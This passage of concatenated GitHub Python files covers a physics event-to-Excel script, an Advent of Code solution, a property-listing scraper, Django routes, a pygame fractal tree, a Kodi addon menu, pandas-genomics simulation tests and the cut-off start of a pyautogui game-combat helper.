eventids_dict=copy.deepcopy(eventids_dict))\n data[key] = d\n\n if include_airplanes == True:\n print('Calculating airplane information')\n ds.prepareCorrelator()\n time_window_s = 5*60\n plot_distance_cut_limit = 500\n min_approach_cut_km = 1e6\n origin = ds.cor.A0_latlonel_hpol\n\n elevation_best_choice = ds.getDataFromParam(eventids_dict, 'elevation_best_choice')\n phi_best_choice = ds.getDataFromParam(eventids_dict, 'phi_best_choice')\n\n all_minimum_approach = numpy.zeros(len(eventids_array), dtype=float)\n all_event_times = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_r = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_t = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_rpt_at_event_time = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_r = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_airplane = numpy.zeros(len(eventids_array), dtype='= 1 and int(pd.__version__.split('.')[1]) >= 4:\n # flipbook_path = '/home/dsouthall/scratch-midway2/event_flipbook_1643154940'#'/home/dsouthall/scratch-midway2/event_flipbook_1642725413'\n # flipbook_path = './airplane_event_flipbook_1643947072'\n flawed_runs = numpy.array([6537,6538,6539]) #numpy.array([5775,5981,5993,6033,6090,6520,6537,6538,6539]) \n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','sept2021-week1-analysis','hand-scanned-event-info.xlsx')\n # include_airplanes = False\n for include_airplanes in [False, True]:\n #['/home/dsouthall/scratch-midway2/event_flipbook_1643154940', './airplane_event_flipbook_1643947072']\n for flipbook_path in ['./september-flipbook']:\n sorted_dict = flipbookToDict(flipbook_path, ignore_runs=flawed_runs)\n if True:\n sheetname = os.path.split(flipbook_path)[-1] + '_airplanes-included-%s'%str(include_airplanes)\n else:\n sheetname = 'raw_airplanes-included-%s'%str(include_airplanes)\n\n df = writeEventDictionaryToDataFrame(sorted_dict, include_airplanes=include_airplanes)\n writeDataFrameToExcel(df, filename, sheetname)\n # writeEventDictionaryToExcel(sorted_dict, filename, ds=None)\n else:\n print('This script requires pandas version >= 1.4.0')\n else:\n cmap = 'cool'#'coolwarm'\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_length = 16384\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_%i-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'%map_length\n \n run_batches = {}\n run_batches['batch_0'] = numpy.arange(5733,5974) # September data, should setup to auto add info to the \"notes\" section based off of existing sorting, and run this one those events for consistency\n run_batches['batch_1'] = numpy.arange(5974,6073)\n run_batches['batch_2'] = numpy.arange(6074,6173)\n run_batches['batch_3'] = 
numpy.arange(6174,6273)\n run_batches['batch_4'] = numpy.arange(6274,6373)\n run_batches['batch_5'] = numpy.arange(6374,6473)\n run_batches['batch_6'] = numpy.arange(6474,6573)\n run_batches['batch_7'] = numpy.arange(6574,6641)\n runs = numpy.array([])\n for k in (run_batches.keys()):\n runs = numpy.append(runs,run_batches[k])\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, \\\n low_ram_mode=True,\\\n analysis_data_dir=processed_datapath, trigger_types=[2], remove_incomplete_runs=True)\n\n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','paper', 'data','new-cut-event-info.xlsx')\n new_cut_dict = numpy.load( os.path.join( '/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/cuts_run5733-run6640_1652152119' , 'pass_all_cuts_eventids_dict.npy') , allow_pickle=True)[()]\n \n df = writeEventDictionaryToDataFrame(new_cut_dict, include_airplanes=False, ds=ds)\n writeDataFrameToExcel(df, filename, 'passing all cuts')\n\n old_cut_dicts = {}\n for i in range(8):\n f = os.path.join('/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/eventid_dicts', 'stage_2_eventids_dict_batch_%i.npy'%i)\n out = numpy.load( f , allow_pickle=True)[()]\n for run in list(out.keys()):\n old_cut_dicts[run] = out[run]\n\n\n new_cut_array = ds.organizeEventDict(new_cut_dict)\n old_cut_array = ds.organizeEventDict(old_cut_dicts)\n\n matching = ds.organizeEventDict(ds.returnCommonEvents(new_cut_dict, old_cut_dicts))\n matching_dict = ds.returnCommonEvents(new_cut_dict, old_cut_dicts)\n \n events_in_new_not_old = ds.organizeEventDict(ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts))\n events_in_new_not_old_dict = ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts)\n\n\n matching_df = df[numpy.logical_and(numpy.isin(df['run'], matching['run']), numpy.isin(df['eventid'], matching['eventid']))]\n writeDataFrameToExcel(matching_df, filename, 'in old')\n\n new_events_df = df[numpy.logical_and(numpy.isin(df['run'], events_in_new_not_old['run']), numpy.isin(df['eventid'], events_in_new_not_old['eventid']))]\n writeDataFrameToExcel(new_events_df, filename, 'new')\n\n\n\n","repo_name":"djsouthall/beacon","sub_path":"tools/write_event_dict_to_excel.py","file_name":"write_event_dict_to_excel.py","file_ext":"py","file_size_in_byte":23505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
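The pandas >= 1.4 requirement noted in the record's header comes from appending sheets to an existing workbook in place; a sketch of that call (file and sheet names illustrative):

import pandas as pd

df = pd.DataFrame({"run": [5733, 5734], "eventid": [10, 42]})
# mode="a" assumes the workbook already exists;
# if_sheet_exists="overlay" (pandas >= 1.4) writes into an existing sheet
with pd.ExcelWriter("event-info.xlsx", engine="openpyxl",
                    mode="a", if_sheet_exists="overlay") as writer:
    df.to_excel(writer, sheet_name="passing all cuts", index=False)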
+{"seq_id":"3665314078","text":"def run_main():\n increases = 0\n old_no = -1\n f = open(\"input/day1a.txt\")\n lines = list(map(int, f.readlines()))\n for i in range(0, 1998):\n a = lines[i]\n b = lines[i+1]\n c = lines[i+2]\n current_no = a + b + c\n if -1 < old_no < current_no:\n increases += 1\n old_no = current_no\n print(increases)\n\n\nif __name__ == '__main__':\n run_main()\n","repo_name":"jl881/aoc","sub_path":"2021/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43744444442","text":"import json\nimport re\nimport sys\nfrom urllib.request import urlopen, Request\n\nimport bs4\nimport requests\n\nexceptions = {}\nstatus_codes = {}\n\n\ndef main():\n global total_pages\n url = 'https://www.towerbudapest.com/en/sales'\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 '\n 'Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n property_links = []\n property_data_list = []\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for paragraph in soup.select('p[class*=\"kill-margin\"]'):\n if 'Page' in str(paragraph.contents[0]):\n total_pages = int(paragraph.contents[0].split(' ')[10])\n break\n print(\"found \" + str(total_pages) + \" pages\")\n for i in range(total_pages):\n print('=', end='')\n print()\n while True:\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for tag in soup.findAll('a',\n attrs={\n 'href': re.compile(\"^https://www.towerbudapest.com/en/sales/budapest_property/\")}):\n property_links.append(tag.get('href'))\n rightButton = soup.select('div[class*=\"text-right\"]')[0].select('button')\n print('.', end='')\n sys.stdout.flush()\n if len(rightButton) != 0:\n url = rightButton[0]['onclick'].split(\"'\")[1]\n else:\n print()\n break\n print()\n print(\"found \" + str(len(property_links)) + \" links\")\n property_links = list(set(property_links))\n print(str(len(property_links)) + \" after removing duplicates\")\n for i in range(len(property_links)):\n if i % 10 == 0:\n print('=', end='')\n print()\n counter = 0\n global status_codes\n global exceptions\n for link in property_links:\n try:\n counter += 1\n if counter % 10 == 0:\n print('.', end='')\n sys.stdout.flush()\n property_data = {}\n content = urlopen(Request(link, headers=hdr)).read()\n soup = bs4.BeautifulSoup(content, features=\"lxml\")\n header = soup.select('div[class*=\"property-content\"]')[0].select('h1')[0].contents[0]\n property_data['name'] = header\n details = soup.select('div[class*=\"property-details-sidebar\"]')[0]\n\n for listitem in details.select('ul')[0].select('li'):\n new_key = listitem.select('strong')[0].contents[0].replace(':', '').lower().replace(' ', '')\n if len(listitem.contents) > 1:\n new_value = str(listitem.contents[1]).strip()\n if new_value == 'Yes':\n new_value = True\n if new_value == 'No':\n new_value = False\n else:\n new_value = True\n property_data[new_key] = new_value\n\n property_data['pricehuf'] = details.select('ul')[1].select('li')[1].contents[0].split()[0].replace('.', '')\n if len(details.select('ul')[1].select('li')) > 2:\n property_data['priceeur'] = details.select('ul')[1].select('li')[2].contents[0].split()[0].replace('.',\n '')\n\n # property_data['contact'] = details.select('ul')[2].select('li')[1].contents[0]\n\n property_data['name'] = property_data['name'].lower()\n recognized_suffixes = ['utca', 'út', 'tér', 'park']\n recognized_suffixes_english = ['street', 'road', 'square', 'park']\n split_name = (str(property_data['name'])).split()\n for s in split_name:\n if s in recognized_suffixes or s in recognized_suffixes_english:\n if s in recognized_suffixes:\n property_data['streetsuffix'] = s\n if s in recognized_suffixes_english:\n property_data['streetsuffix'] = 
recognized_suffixes[recognized_suffixes_english.index(s)]\n split_name.remove(s)\n property_data['streetname'] = ' '.join(split_name)\n break\n\n property_data['size'] = int(property_data['size'].split(' ')[0])\n\n property_data_list.append(property_data)\n r = requests.post(\"https://propertybuddy-database.herokuapp.com/properties\", json=property_data)\n # r = requests.post(\"http://localhost:8080/properties\", json=property_data)\n\n latest_status_code = (r.status_code, json.loads(r.content)['message'])\n if latest_status_code in status_codes:\n status_codes[latest_status_code] += 1\n else:\n status_codes[latest_status_code] = 1\n except Exception as e:\n latest_exception = str(e)\n if \"HTTPSConnectionPool\" in latest_exception and \"Max retries exceeded with url\" in latest_exception:\n latest_exception = latest_exception.split(\"(Caused\")[0]\n if latest_exception in exceptions:\n exceptions[latest_exception] += 1\n else:\n exceptions[latest_exception] = 1\n print()\n print()\n print('all done')\n end_print()\n\n\ndef end_print():\n print('status codes:')\n for c in status_codes:\n print(\"\\t\" + str(c[0]) + \"\\tx\" + str(status_codes[c]) + \"\\n\\t\\t\" + str(c[1]))\n print('exceptions:')\n for e in exceptions:\n print(\"\\t\" + e + \"\\tx\" + str(exceptions[e]))\n\n\ntry:\n main()\nexcept KeyboardInterrupt:\n print()\n print()\n print('exiting on user interrupt')\n end_print()\n","repo_name":"zapathy/webscraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
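The hand-rolled status_codes and exceptions tallies above are exactly what collections.Counter provides; a sketch of the same bookkeeping:

from collections import Counter

status_codes = Counter()
status_codes[(200, "created")] += 1
status_codes[(409, "duplicate")] += 1
status_codes[(200, "created")] += 1

# most_common() yields (key, count) pairs sorted by frequency
for (code, message), count in status_codes.most_common():
    print(f"\t{code}\tx{count}\n\t\t{message}")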
+{"seq_id":"25697992927","text":"from django.urls import path\n\nfrom .views import OperationViewSet, CategoryView, CategoryListView, ListOperationsOfBill, FilterOperationsView, \\\n SearchView\n\nurlpatterns = [\n path('operation', OperationViewSet.as_view({\n 'post': 'create',\n 'delete': 'destroy',\n 'put': 'update',\n 'get': 'retrieve'\n })),\n path('operations', OperationViewSet.as_view({\n 'get': 'list'\n })),\n path('operations-of-bill', ListOperationsOfBill.as_view()),\n path('categories', CategoryListView.as_view({\n 'get': 'list'\n })),\n path('category', CategoryView.as_view({\n 'post': 'create'\n })),\n path('filter-operations', FilterOperationsView.as_view()),\n path('search', SearchView.as_view())\n]\n","repo_name":"bifenbecker/FinanceControl-bankAccounts","sub_path":"operations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11075056089","text":"import pygame, sys, math\n\nclass observer:\n def __init__(self):\n self.observer_list = []\n\n def add(self, objs):\n self.observer_list += objs\n\n def notify(self, pos):\n for observer in self.observer_list:\n d = observer.on_notify(pos)\n if d: return d\n\n return None\n\n\nclass slider:\n def __init__(self, pos, name, tree):\n self.x, self.y = pos\n self.height = 200\n self.name = name\n self.rect_width, self.rect_height = 20, 10\n self.slide = pygame.Rect((self.x-10,self.y+self.height/2-self.rect_height/2),(self.rect_width, self.rect_height))\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n self.trees = tree\n\n def on_notify(self, pos):\n if (abs(pos[0]-self.x)<20) and (self.y pos[1])):\n self.slide.move_ip(0, pos[1]-self.slide.y)\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n if self.name == \"teta1\": return (self.trees.teta[0], -math.radians(self.degrees))\n else :return (math.radians(self.degrees),self.trees.teta[1])\n return None\n\n\n def draw(self, surface):\n myfont = pygame.font.SysFont(\"\", 15)\n textsurface = myfont.render(\n f\"{self.name} {round(self.degrees,2)}\", False, (0,0,0)\n )\n textRect = textsurface.get_rect()\n textRect.center = (self.x, self.y-10)\n surface.blit(textsurface, textRect)\n\n pygame.draw.line(surface, (0,0,0), (self.x, self.y), (self.x, self.y+self.height), 2)\n pygame.draw.rect(surface, (0,0,110), self.slide)\n\n\nclass tree:\n def __init__(self, size, k, teta):\n self.w, self.h = size\n self.lenght = 100\n self.k = k\n self.teta = teta\n self.max = 15\n\n def update(self, teta):\n if teta:\n self.teta = teta\n\n def draw(self, surface, line=None, angle=math.pi/2, it=1):\n if not line: line = [(self.w/2, self.h), (self.w/2, self.h*3/4)]\n if it > self.max: return 0\n if it> 7*self.max//10: pygame.draw.line(surface, (71,148,71),line[0], line[1])\n else: pygame.draw.line(surface, (102,51,0),line[0], line[1])\n\n for i in range(2):\n x = self.lenght*(self.k[i]**it)*math.cos(angle + self.teta[i]) + line[-1][0]\n y = -self.lenght*(self.k[i]**it)*math.sin(angle + self.teta[i]) + line[-1][1]\n self.draw(surface,[line[-1], (x,y)], angle+self.teta[i], it+1)\n\n\nclass main:\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = (600, 500)\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, 0 , 32)\n self._running = True\n self.tree = tree(self.size, [0.65, 0.75], [math.radians(20), -math.radians(10)])\n self.sliders = [slider((490, 50), \"teta1\", self.tree), slider((560, 50), \"teta2\", self.tree)]\n self.observers = observer()\n self.observers.add(self.sliders)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n degrees = self.observers.notify(pygame.mouse.get_pos())\n self.tree.update(degrees)\n self.on_loop()\n\n def on_loop(self):\n self._display_surf.fill((255,255,255))\n self.tree.draw(self._display_surf)\n for slider in self.sliders:\n slider.draw(self._display_surf)\n pygame.display.update()\n\n def on_render(self):\n pass\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self):\n if self.on_init() == False:\n self._running = False\n\n self.on_loop()\n while ( self._running ):\n for event in pygame.event.get():\n self.on_event(event)\n self.on_render()\n self.on_cleanup()\n\nif __name__ == \"__main__\":\n theApp = main()\n 
theApp.on_execute()\n","repo_name":"MasMat2/Fractals","sub_path":"treegame.py","file_name":"treegame.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
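The recursion above places each child branch with simple polar-to-screen arithmetic (screen y grows downward, hence the minus sign); the endpoint formula in isolation:

import math

def branch_end(start, length, angle):
    """End point of a branch of given length at `angle` radians, screen coords."""
    x = start[0] + length * math.cos(angle)
    y = start[1] - length * math.sin(angle)   # screen y axis points down
    return (x, y)

print(branch_end((300, 500), 100, math.pi / 2))   # straight up -> approx (300, 400)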
+{"seq_id":"30776906790","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Defines the StagedMoviesMenu class.\"\"\"\n\nimport xbmcgui\n\nfrom resources import ADDON_NAME\n\nfrom resources.lib.log import logged_function\n\nfrom resources.lib.misc import getstring\nfrom resources.lib.misc import notification\n\n\nclass StagedMoviesMenu():\n \"\"\"Provide windows for displaying staged movies, and tools for managing the items.\"\"\"\n\n # TODO: don't commit sql changes for \"... all\" until end\n # TODO: decorator for \"...all\" commands\n # TODO: load staged movies on init, use as instance variable, refresh as needed\n\n def __init__(self, database, progressdialog):\n \"\"\"__init__ StagedMoviesMenu.\"\"\"\n self.database = database\n self.progressdialog = progressdialog\n\n @logged_function\n def add_all(self, items):\n \"\"\"Add all staged movies to library.\"\"\"\n STR_ADDING_ALL_MOVIES = getstring(32042)\n STR_ALL_MOVIES_ADDED = getstring(32043)\n self.progressdialog.create_progressdialog(\n msg=STR_ADDING_ALL_MOVIES\n )\n for index, item in enumerate(items):\n self.progressdialog.update_progressdialog(\n index / len(items),\n item.title()\n )\n item.add_to_library()\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_ADDED)\n\n @staticmethod\n def rename_dialog(item):\n \"\"\"Prompt input for new name, and rename if non-empty string.\"\"\"\n # TODO: move to utils or parent class so it's not duplicated\n input_ret = xbmcgui.Dialog().input(\n \"Title\",\n defaultt=item.title()\n )\n if input_ret:\n item.rename(input_ret)\n\n @logged_function\n def options(self, item):\n \"\"\"Provide options for a single staged movie in a dialog window.\"\"\"\n STR_ADD = getstring(32048)\n STR_REMOVE = getstring(32017)\n STR_REMOVE_AND_BLOCK = getstring(32049)\n STR_RENAME = getstring(32050)\n STR_STAGED_MOVIE_OPTIONS = getstring(32053)\n STR_BACK = getstring(32011)\n lines = [\n STR_ADD,\n STR_REMOVE,\n STR_REMOVE_AND_BLOCK,\n # STR_RENAME,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1} - {2}'.format(\n ADDON_NAME,\n STR_STAGED_MOVIE_OPTIONS,\n item.title),\n lines\n )\n if ret >= 0:\n if lines[ret] == STR_ADD:\n item.add_to_library()\n self.view_all()\n elif lines[ret] == STR_REMOVE:\n item.delete()\n self.view_all()\n elif lines[ret] == STR_REMOVE_AND_BLOCK:\n item.remove_and_block()\n self.view_all()\n elif lines[ret] == STR_RENAME:\n self.rename_dialog(item)\n self.options(item)\n elif lines[ret] == STR_BACK:\n return\n\n else:\n self.view_all()\n\n @logged_function\n def remove_all(self):\n \"\"\"Remove all staged movies.\"\"\"\n STR_REMOVING_ALL_MOVIES = getstring(32013)\n STR_ALL_MOVIES_REMOVED = getstring(32014)\n self.progressdialog.create_progressdialog(\n msg=STR_REMOVING_ALL_MOVIES\n )\n self.database.delete_item_from_table_with_status_or_showtitle(\n _type='movie',\n status='staged'\n )\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_REMOVED)\n\n @logged_function\n def view_all(self):\n \"\"\"\n Display all staged movies, which are selectable and lead to options.\n\n Also provides additional options at bottom of menu.\n \"\"\"\n STR_NO_STAGED_MOVIES = getstring(32037)\n STR_ADD_ALL_MOVIES = getstring(32038)\n STR_REMOVE_ALL_MOVIES = getstring(32009)\n STR_BACK = getstring(32011)\n STR_STAGED_MOVIES = getstring(32004)\n staged_movies = list(\n self.database.get_content_items(\n status='staged',\n _type='movie'\n )\n )\n if not staged_movies:\n xbmcgui.Dialog().ok(ADDON_NAME, STR_NO_STAGED_MOVIES)\n return\n lines = [str(x) for x in 
staged_movies]\n lines += [\n STR_ADD_ALL_MOVIES,\n STR_REMOVE_ALL_MOVIES,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1}'.format(ADDON_NAME, STR_STAGED_MOVIES), lines\n )\n if ret >= 0:\n if ret < len(staged_movies): # staged item\n for i, item in enumerate(staged_movies):\n if ret == i:\n self.options(item)\n break\n elif lines[ret] == STR_ADD_ALL_MOVIES:\n self.add_all(staged_movies)\n elif lines[ret] == STR_REMOVE_ALL_MOVIES:\n self.remove_all()\n elif lines[ret] == STR_BACK:\n return\n","repo_name":"curdh/script.library.integration.tool","sub_path":"resources/lib/menus/staged_movies.py","file_name":"staged_movies.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"7955729399","text":"import numpy as np\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom pandas_genomics import sim\nfrom pandas_genomics.sim import BAMS, SNPEffectEncodings, PenetranceTables\n\n\ndef assert_frame_not_equal(*args, **kwargs):\n try:\n assert_frame_equal(*args, **kwargs)\n except AssertionError:\n # frames are not equal\n pass\n else:\n # frames are equal\n raise AssertionError\n\n\n@pytest.mark.parametrize(\n \"pen_table,baseline,diff,expected\",\n [\n (sim.PenetranceTables.NULL, 0.1, 0.8, [0.5] * 9),\n (sim.PenetranceTables.NULL, 0.0, 0.5, [0.25] * 9),\n (\n sim.PenetranceTables.HET_HET,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n np.array(sim.PenetranceTables.HET_HET.value).reshape((3, 3)) * 10,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n sim.PenetranceTables.HET_HA,\n 0.1,\n 0.9,\n [0.1, 0.1, 0.1, 0.1, 0.1, 1.0, 0.1, 0.1, 0.1],\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n -1,\n 0,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n ],\n)\ndef test_pen_table_direct(pen_table, baseline, diff, expected):\n \"\"\"Test calculation of final penetrance table when a penetrance table is specified\"\"\"\n model = BAMS(pen_table=pen_table, penetrance_base=baseline, penetrance_diff=diff)\n np.isclose(model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))).all()\n\n\n@pytest.mark.parametrize(\n \"eff1,eff2,baseline,diff,main1,main2,interaction,expected\",\n [\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 0,\n [0.1, 0.5, 0.5, 0.5, 0.9, 0.9, 0.5, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 0,\n 0,\n 1,\n [0.1, 0.1, 0.1, 0.1, 0.9, 0.9, 0.1, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 10,\n [0.1, 1 / 6, 1 / 6, 1 / 6, 0.9, 0.9, 1 / 6, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.ADDITIVE,\n sim.SNPEffectEncodings.RECESSIVE,\n 0.2,\n 0.4,\n 1,\n 1,\n -1,\n [0.2, 0.4, 0.6, 0.2, 0.4, 0.6, 0.6, 0.6, 0.6],\n ),\n ],\n)\ndef test_pen_table_model(\n eff1, eff2, baseline, diff, main1, main2, interaction, expected\n):\n \"\"\"Test calculation of final penetrance table from a model\"\"\"\n model = BAMS.from_model(\n eff1=eff1,\n eff2=eff2,\n penetrance_base=baseline,\n penetrance_diff=diff,\n main1=main1,\n main2=main2,\n interaction=interaction,\n )\n assert np.isclose(\n model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))\n ).all()\n\n\ndef test_random_seed():\n test_sim = BAMS.from_model(\n SNPEffectEncodings.RECESSIVE,\n SNPEffectEncodings.RECESSIVE,\n main1=1,\n main2=1,\n interaction=1,\n random_seed=123,\n )\n\n # Test simulating data using random seeds\n original_cc_sim = test_sim.generate_case_control(snr=0.1)\n original_quant_sim = test_sim.generate_quantitative(snr=0.1)\n repeat_cc_sim = test_sim.generate_case_control(snr=0.1)\n repeat_quant_sim = test_sim.generate_quantitative(snr=0.1)\n test_sim.set_random_seed(456)\n newseed_cc_sim = test_sim.generate_case_control(snr=0.1)\n newseed_quant_sim = test_sim.generate_quantitative(snr=0.1)\n 
test_sim.set_random_seed(123)\n redo_cc_sim = test_sim.generate_case_control(snr=0.1)\n redo_quant_sim = test_sim.generate_quantitative(snr=0.1)\n\n # Subsequent runs are different\n assert_frame_not_equal(original_cc_sim, repeat_cc_sim)\n assert_frame_not_equal(original_quant_sim, repeat_quant_sim)\n\n # New seed should be different\n assert_frame_not_equal(original_cc_sim, newseed_cc_sim)\n assert_frame_not_equal(original_quant_sim, newseed_quant_sim)\n\n # Resetting seed should match original\n assert_frame_equal(original_cc_sim, redo_cc_sim)\n assert_frame_equal(original_quant_sim, redo_quant_sim)\n\n\ndef test_null():\n bas = BAMS(PenetranceTables.NULL)\n simulated = bas.generate_case_control(10000, 1000, 0.1, 0.1)\n # maf should be similar to the specified one despite a large fraction of cases\n # specifically assert it is within 5%\n assert abs(0.1 - simulated[\"SNP1\"].genomics.maf) / 0.1 < 0.05\n","repo_name":"HallLab/pandas-genomics","sub_path":"tests/simulation/test_biallelic_sim.py","file_name":"test_biallelic_sim.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"32"}
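The test_random_seed case above relies on set_random_seed() making generation reproducible: consecutive draws differ, but reseeding replays the stream. A minimal sketch of that seed-reset pattern using numpy only; DemoSim is a hypothetical stand-in, not the pandas_genomics BAMS API.

import numpy as np

class DemoSim:
    # hypothetical simulator: re-creating the generator replays the stream
    def __init__(self, random_seed=123):
        self.set_random_seed(random_seed)

    def set_random_seed(self, seed):
        self._rng = np.random.default_rng(seed)

    def generate(self, n=5):
        return self._rng.integers(0, 3, size=n)

sim_ = DemoSim(123)
first = sim_.generate()
second = sim_.generate()                        # consecutive draws differ
sim_.set_random_seed(123)
assert np.array_equal(first, sim_.generate())   # reseeding reproduces the first draw
assert not np.array_equal(first, second)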
+{"seq_id":"8626666688","text":"import pyautogui\nimport cv2\nimport numpy as np\nimport time\nfrom Divers import Divers as divers\nimport random\nimport copy\n\ndef combat_fini():\n template = cv2.imread('Picture/fermer_combat.png', 0)\n template_BW = cv2.threshold(template, 100, 255, cv2.THRESH_BINARY)[1]\n image = pyautogui.screenshot(region=(571, 416, 90, 230))\n # image.show()\n img_rgb = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_BGR2GRAY)\n img_BW = cv2.threshold(img_gray, 100, 255, cv2.THRESH_BINARY)[1]\n res2 = cv2.matchTemplate(img_BW, template_BW, cv2.TM_SQDIFF_NORMED)\n threshold = 0.1\n\n # Store the coordinates of matched area in a numpy array\n if np.any(res2 <= threshold):\n position = np.where(res2 <= threshold)\n result = (1, position[1][0]+571, position[0][0]+416)\n else:\n result = (0, 20, 20)\n return result\n\n\ndef click_combat_fini(pause=[False]):\n bool_fini = combat_fini()\n if bool_fini[0] == 1:\n divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n\n\ndef findperso(color1, color2, color3, dist=10, tol=4):\n now = pyautogui.screenshot\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color1, sauf=pos_nope, tol=tol)\n # print(pos1)\n # print(pos_nope)\n if pos1:\n if divers.findcolor(color2, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n pos_nope = []\n while True:\n pos1 = divers.findcolor(color2, sauf=pos_nope, tol=tol)\n if pos1:\n if divers.findcolor(color3, initial=(pos1[0]-dist, pos1[1]-dist), final=(pos1[0]+dist, pos1[1]+dist), tol=tol):\n return pos1\n pos_nope.append((pos1[0]-dist, pos1[1]-dist, pos1[0]+dist, pos1[1]+dist))\n else:\n break\n return None\n\n\ndef obstacle(origine):\n dX = 2\n dY = 2\n color = (34, 51, 153)\n tol = 2\n\n color = np.uint8([[[color[0], color[1], color[2] ]]])\n hsv_color = 